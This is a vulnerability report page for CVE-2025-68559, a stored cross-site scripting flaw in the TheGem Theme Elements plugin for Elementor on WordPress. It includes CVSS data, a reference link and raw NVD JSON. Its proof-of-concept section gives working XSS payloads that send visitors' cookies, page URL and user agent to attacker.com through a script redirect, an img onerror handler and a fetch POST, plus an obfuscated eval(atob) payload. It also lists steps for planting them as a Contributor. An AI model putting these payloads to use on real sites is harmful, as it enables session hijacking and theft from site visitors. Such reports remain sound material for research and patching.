Security Vulnerability Report
CVE-2025-68559 CVSS 6.5 MEDIUM

CVE-2025-68559

Published: 2025-12-23 12:15:46
Last Modified: 2026-04-23 15:36:01

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor. This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.10.5.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TheGem Theme Elements for Elementor <= 5.10.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-68559 PoC - Stored XSS in TheGem Theme Elements for Elementor -->
<!-- This PoC demonstrates the XSS vulnerability in TheGem Theme Elements for Elementor plugin -->
<!-- Usage: Insert this payload in any text field of TheGem Elements in Elementor editor -->
<script>
// Basic XSS payload to demonstrate cookie stealing
document.location='https://attacker.com/steal?cookie='+document.cookie;
</script>

<!-- Alternative payload using img tag with onerror event -->
<img src=x onerror="this.src='https://attacker.com/log?data='+document.cookie">

<!-- More obfuscated payload -->
<svg/onload=eval(atob('ZG9jdW1lbnQuY29va2ll'))>

<!-- Payload to demonstrate session hijacking -->
<script>
fetch('https://attacker.com/api/log', {
  method: 'POST',
  mode: 'no-cors',
  body: JSON.stringify({
    cookie: document.cookie,
    url: window.location.href,
    userAgent: navigator.userAgent
  })
});
</script>

<!-- Steps to exploit:
1. Login to WordPress with Contributor+ role
2. Edit any page with Elementor
3. Add TheGem element (e.g., Text Editor, Button, etc.)
4. Insert the XSS payload in the content field
5. Save and publish the page
6. Any user visiting the page will execute the malicious script
-->

References

https://patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68559", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:46.290", "lastModified": "2026-04-23T15:36:01.363", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.10.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}